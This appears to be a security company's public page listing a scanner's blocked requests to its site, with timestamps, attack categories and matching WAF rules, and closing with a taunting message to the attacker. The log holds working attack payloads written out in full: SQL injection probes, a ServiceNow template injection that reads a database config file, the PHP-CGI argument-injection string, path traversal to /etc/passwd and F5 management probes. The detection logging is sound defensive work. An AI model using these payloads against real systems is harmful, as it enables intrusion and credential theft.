70 2026-02-12T04:44:03Z Server-Side Request Forgery GET / ssrf [HEADER][HTTP_USER_AGENT] matched /(?:127\.0\.0\.[01]|0\.0\.0\.0|localhost|::1|\[::1\])/i
71 2026-02-12T04:45:49Z General Fuzzing / Forced Browsing GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig Forced browsing attempt: /cgi-bin/admin.cgi
72 2026-02-12T04:55:37Z SQL Injection POST /WSStatusEvents/EventHandler.asmx sqli [BODY][__raw__] matched /;\s*(?:DROP|ALTER|CREATE|TRUNCATE|INSERT|UPDATE|DELETE|EXEC|EXECUTE)\b/i
73 2026-02-12T05:16:23Z SQL Injection POST /cmd,/simZysh/register_main/setCookie sqli [POST][c0] matched /#\s*$/m
74 2026-02-12T05:21:23Z General Fuzzing / Forced Browsing POST /tmui/login.jsp BANNED (repeat offender)
75 2026-02-12T05:21:25Z General Fuzzing / Forced Browsing PATCH /mgmt/tm/auth/user/3xnWv BANNED (repeat offender)
76 2026-02-12T05:21:27Z General Fuzzing / Forced Browsing POST /mgmt/shared/authn/login BANNED (repeat offender)
77 2026-02-12T05:21:30Z General Fuzzing / Forced Browsing POST /mgmt/tm/util/bash BANNED (repeat offender)
78 2026-02-12T05:21:32Z General Fuzzing / Forced Browsing PATCH /mgmt/tm/auth/user/3xnWv BANNED (repeat offender)
79 2026-02-12T05:21:35Z General Fuzzing / Forced Browsing POST /mgmt/shared/authn/login BANNED (repeat offender)
80 2026-02-12T05:21:37Z General Fuzzing / Forced Browsing POST /mgmt/tm/util/bash BANNED (repeat offender)
81 2026-02-12T05:30:24Z General Fuzzing / Forced Browsing POST /cgi-bin/cstecgi.cgi?token BANNED (repeat offender)
82 2026-02-12T05:30:27Z General Fuzzing / Forced Browsing GET /39GigEjKDX2qnk2rXvUxWPczWNf.txt BANNED (repeat offender)
83 2026-02-12T05:32:31Z General Fuzzing / Forced Browsing POST /cgi-bin/cstecgi.cgi?token=C6F41C563E86A379 BANNED (repeat offender)
84 2026-02-12T05:32:34Z General Fuzzing / Forced Browsing GET /39GigBUy8FEXAfx1QcNrKQvQPsn.txt BANNED (repeat offender)
85 2026-02-12T05:46:02Z General Fuzzing / Forced Browsing POST /index.php?/store/ BANNED (repeat offender)
86 2026-02-12T05:56:23Z General Fuzzing / Forced Browsing POST /graphql BANNED (repeat offender)
87 2026-02-12T06:02:48Z General Fuzzing / Forced Browsing GET /wp-content/plugins/fluentform/readme.txt BANNED (repeat offender)
88 2026-02-12T07:02:32Z SQL Injection GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5(999999999),0x7c,%20%22Version:%22,version()),13--+- sqli [GET][group-name] matched /\bUNION\b[\s\/\*]+\bALL\b[\s\/\*]+\bSELECT\b/i
89 2026-02-12T07:16:31Z General Fuzzing / Forced Browsing GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= Forced browsing attempt: /cgi-bin/nas_sharing.cgi
90 2026-02-12T07:26:13Z General Fuzzing / Forced Browsing POST /apriso/portal/kiosk/querylogin.aspx general_fuzzing [POST][EncryptedLogonInfo] matched /^.{10000,}$/s
91 2026-02-12T08:36:28Z SQL Injection GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept sqli [GET][delegate] matched /\bUNION\b[\s\/\*]+\bSELECT\b/i
92 2026-02-12T09:20:21Z SQL Injection POST /api/ sqli [BODY][__raw__] matched /\b(?:CONCAT|CHAR|UNHEX|HEX|ASCII|ORD|CONV|CAST|CONVERT)\s*\(/i
93 2026-02-12T09:42:16Z Template Injection POST /bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender template_injection [POST][register_first_name] matched /\{\{.*\}\}/s
94 2026-02-12T09:42:19Z Template Injection POST /xwiki/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender template_injection [POST][register_first_name] matched /\{\{.*\}\}/s
95 2026-02-12T10:20:26Z LDAP Injection POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport ldap_injection [POST][groovyProgram] matched /[)(|*\\]\s*[)(|*\\]/i
96 2026-02-12T10:20:27Z LDAP Injection POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport ldap_injection [POST][groovyProgram] matched /[)(|*\\]\s*[)(|*\\]/i
97 2026-02-12T10:20:29Z LDAP Injection POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport ldap_injection [POST][groovyProgram] matched /[)(|*\\]\s*[)(|*\\]/i
98 2026-02-12T10:49:27Z SQL Injection GET /zm/index.php?sort=if(now()=sysdate()%2Csleep(6)%2C0)&order=desc&limit=20&view=request&request=watch&mid=1 sqli [GET][sort] matched /\b(?:BENCHMARK|SLEEP|WAITFOR|DELAY|PG_SLEEP)\s*\(/i
99 2026-02-12T10:54:54Z LDAP Injection POST /secserver/ ldap_injection [BODY][__raw__] matched /[)(|*\\]\s*[)(|*\\]/i
100 2026-02-12T10:54:55Z LDAP Injection POST /secserver/ ldap_injection [BODY][__raw__] matched /[)(|*\\]\s*[)(|*\\]/i
101 2026-02-12T11:02:28Z Path Traversal POST /ssl-vpn/hipreport.esp path_traversal [COOKIE][SESSID] matched /(?:\.\.\/){2,}/i
102 2026-02-12T11:02:29Z Server-Side Request Forgery GET /global-protect/portal/images/39GigF4EGHMifAmZCvF191OqxgO.txt ssrf [HEADER][HTTP_USER_AGENT] matched /(?:127\.0\.0\.[01]|0\.0\.0\.0|localhost|::1|\[::1\])/i
103 2026-02-12T11:16:48Z SQL Injection POST /as/wapi/vmp sqli [POST][meeting_id] matched /\bUNION\b[\s\/\*]+\bSELECT\b/i
104 2026-02-12T11:16:49Z SQL Injection POST /as/wapi/vmp sqli [POST][meeting_id] matched /\bUNION\b[\s\/\*]+\bSELECT\b/i
105 2026-02-12T11:17:24Z LDAP Injection POST /webtools/control/main/ProgramExport ldap_injection [POST][groovyProgram] matched /[)(|*\\]\s*[)(|*\\]/i
106 2026-02-12T11:17:25Z LDAP Injection POST /webtools/control/main/ProgramExport ldap_injection [POST][groovyProgram] matched /[)(|*\\]\s*[)(|*\\]/i
107 2026-02-12T12:43:34Z SQL Injection POST /business-directory/?dosrch=1&q&wpbdp_view=search&listingfields[+or+sleep(if(1%3d1,6,0))+))--+-][1] sqli [URI][REQUEST_URI] matched /\b(?:BENCHMARK|SLEEP|WAITFOR|DELAY|PG_SLEEP)\s*\(/i
108 2026-02-12T13:45:12Z Server-Side Request Forgery GET /wp-content/plugins/dokan-pro/changelog.txt ssrf [HEADER][HTTP_USER_AGENT] matched /(?:127\.0\.0\.[01]|0\.0\.0\.0|localhost|::1|\[::1\])/i
109 2026-02-12T15:14:20Z SQL Injection POST /drag/onlDragDatasetHead/getTotalData sqli [BODY][__raw__] matched /\b(?:CONCAT|CHAR|UNHEX|HEX|ASCII|ORD|CONV|CAST|CONVERT)\s*\(/i
110 2026-02-12T15:14:20Z SQL Injection POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData sqli [BODY][__raw__] matched /\b(?:CONCAT|CHAR|UNHEX|HEX|ASCII|ORD|CONV|CAST|CONVERT)\s*\(/i
111 2026-02-12T15:19:34Z Path Traversal POST /php/components/logs.php path_traversal [POST][items] matched /(?:\.\.\/){2,}/i
112 2026-02-12T15:53:35Z LDAP Injection POST /NmAPI/RecurringReport ldap_injection [BODY][__raw__] matched /[)(|*\\]\s*[)(|*\\]/i
113 2026-02-12T16:06:48Z Cross-Site Scripting (XSS) GET /login.do?jvar_page_title=<style><j:jelly%20xmlns:j="jelly"%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(1337*1337);</g:evaluate></j:jelly></style> xss [GET][jvar_page_title] matched /<\s*(?:img|svg|body|iframe|object|embed|link|style|base|meta|form|input|button|details|marquee|video|audio|source|math|table)\b[^>]*>/i
114 2026-02-12T16:15:18Z General Fuzzing / Forced Browsing POST /node_modules/angular-base64-upload/demo/server.php Forced browsing attempt: /node_modules/angular-base64-upload/demo/server
115 2026-02-12T16:45:22Z LDAP Injection POST /index.php?rest_route=/wqc/v1/query ldap_injection [BODY][__raw__] matched /[)(|*\\]\s*[)(|*\\]/i
116 2026-02-12T17:06:22Z Path Traversal POST /v1/api path_traversal [POST][cloud_type] matched /(?:\/|\\)etc(?:\/|\\)(?:passwd|shadow|group|hosts|crontab)/i
117 2026-02-12T17:44:46Z SQL Injection GET /ResetUserInfo.php?user_type_form=username&uname_user_type=uname_student&username_stn_id=21+OR+3720%3dBENCHMARK(7000000,MD5(0x6e48446e))&pass=1&month_username_dob=x&day_username_dob=x&year_username_dob=x sqli [GET][username_stn_id] matched /\b(?:BENCHMARK|SLEEP|WAITFOR|DELAY|PG_SLEEP)\s*\(/i
118 2026-02-12T18:18:31Z General Fuzzing / Forced Browsing GET /wp-admin/index.php Forced browsing attempt: /wp-admin/index
119 2026-02-12T18:43:51Z General Fuzzing / Forced Browsing GET /asispanel/ BANNED (repeat offender)
120 2026-02-12T19:10:59Z General Fuzzing / Forced Browsing GET / BANNED (repeat offender)
121 2026-02-12T19:15:01Z General Fuzzing / Forced Browsing POST /php/server/util.php BANNED (repeat offender)
122 2026-02-12T19:16:20Z General Fuzzing / Forced Browsing GET /cgi-bin/sslvpnclient?launchplatform BANNED (repeat offender)
123 2026-02-12T19:23:07Z General Fuzzing / Forced Browsing GET /admin/login Forced browsing attempt: /admin/login
124 2026-02-12T20:15:01Z General Fuzzing / Forced Browsing POST /cgi/getGDPRParm Forced browsing attempt: /cgi/getgdprparm
125 2026-02-12T20:25:20Z General Fuzzing / Forced Browsing POST /cgi/getParm Forced browsing attempt: /cgi/getparm
126 2026-02-12T20:39:00Z Local/Remote File Inclusion POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input lfi_rfi [URI][REQUEST_URI] matched /(?:php|zip|data|expect|input|filter)\s*:\/\//i
127 2026-02-12T20:39:02Z Local/Remote File Inclusion POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input lfi_rfi [URI][REQUEST_URI] matched /(?:php|zip|data|expect|input|filter)\s*:\/\//i
128 2026-02-12T20:39:03Z Local/Remote File Inclusion POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input lfi_rfi [URI][REQUEST_URI] matched /(?:php|zip|data|expect|input|filter)\s*:\/\//i
129 2026-02-12T20:39:04Z Local/Remote File Inclusion POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input lfi_rfi [URI][REQUEST_URI] matched /(?:php|zip|data|expect|input|filter)\s*:\/\//i
130 2026-02-12T20:53:58Z Server-Side Request Forgery GET /?mobile_co=1&uid=1 ssrf [HEADER][HTTP_USER_AGENT] matched /(?:127\.0\.0\.[01]|0\.0\.0\.0|localhost|::1|\[::1\])/i
131 2026-02-12T20:53:59Z General Fuzzing / Forced Browsing POST /wp-admin/index.php Forced browsing attempt: /wp-admin/index
132 2026-02-12T20:56:34Z SQL Injection GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj%3Ajelly%2Bxmlns%3Aj%3D%22jelly%3Acore%22%2Bxmlns%3Ag%3D'glide'%3E%3Cg%3Aevaluate%3Ez%3Dnew%2BPackages.java.io.File(%22%22).getAbsolutePath()%3Bz%3Dz.substring(0%2Cz.lastIndexOf(%22%2F%22))%3Bu%3Dnew%2BSecurelyAccess(z.concat(%22%2Fco..nf%2Fglide.db.properties%22)).getBufferedReader()%3Bs%3D%22%22%3Bwhile((q%3Du.readLine())!%3D%3Dnull)s%3Ds.concat(q%2C%22%5Cn%22)%3Bgs.addErrorMessage(s)%3B%3C%2Fg%3Aevaluate%3E%3C%2Fj%3Ajelly%3E%3C%2Fstyle%3E sqli [GET][jvar_page_title] matched /\b(?:CONCAT|CHAR|UNHEX|HEX|ASCII|ORD|CONV|CAST|CONVERT)\s*\(/i
133 2026-02-12T20:56:34Z General Fuzzing / Forced Browsing GET /login.do?jvar_page_title=%3c%73%74%79%6c%65%3e%3c%6a%3a%6a%65%6c%6c%79%20%78%6d%6c%6e%73%3a%6a%3d%22%6a%65%6c%6c%79%3a%63%6f%72%65%22%20%78%6d%6c%6e%73%3a%67%3d%27%67%6c%69%64%65%27%3e%3c%67%3a%65%76%61%6c%75%61%74%65%3e%7a%3d%6e%65%77%20%50%61%63%6b%61%67%65%73%2e%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%22%22%29%2e%67%65%74%41%62%73%6f%6c%75%74%65%50%61%74%68%28%29%3b%7a%3d%7a%2e%73%75%62%73%74%72%69%6e%67%28%30%2c%7a%2e%6c%61%73%74%49%6e%64%65%78%4f%66%28%22%2f%22%29%29%3b%75%3d%6e%65%77%20%53%65%63%75%72%65%6c%79%41%63%63%65%73%73%28%7a%2e%63%6f%6e%63%61%74%28%22%2f%63%6f%2e%2e%6e%66%2f%67%6c%69%64%65%2e%64%62%2e%70%72%6f%70%65%72%74%69%65%73%22%29%29%2e%67%65%74%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%29%3b%73%3d%22%22%3b%77%68%69%6c%65%28%28%71%3d%75%2e%72%65%61%64%4c%69%6e%65%28%29%29%21%3d%3d%6e%75%6c%6c%29%73%3d%73%2e%63%6f%6e%63%61%74%28%71%2c%22%5c%6e%22%29%3b%67%73%2e%61%64%64%45%72%72%6f%72%4d%65%73%73%61%67%65%28%73%29%3b%3c%2f%67%3a%65%76%61%6c%75%61%74%65%3e%3c%2f%6a%3a%6a%65%6c%6c%79%3e%3c%2f%73%74%79%6c%65%3e BANNED (repeat offender)
134 2026-02-12T21:28:42Z General Fuzzing / Forced Browsing POST /wp-admin/admin-ajax.php BANNED (repeat offender)
135 2026-02-12T21:30:23Z General Fuzzing / Forced Browsing GET /users BANNED (repeat offender)
136 2026-02-12T21:30:24Z General Fuzzing / Forced Browsing GET /users;. BANNED (repeat offender)
137 2026-02-12T21:37:21Z General Fuzzing / Forced Browsing GET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) BANNED (repeat offender)
138 2026-02-12T21:45:05Z General Fuzzing / Forced Browsing GET /internal/v2/config/mps_secret/ADM_SESSIONID BANNED (repeat offender)

In Summary

You came. You saw. You got absolutely owned by a hedgehog.

Every request you made was detected, logged, and laughed at. Our WAF didn't even break a sweat. Maybe next time try something more challenging — like reading a book on operational security.

Pro tip: If you're going to hack a cybersecurity company, maybe don't use the same IP address for every single request. Just a thought.

Back to Safety Hire Us Instead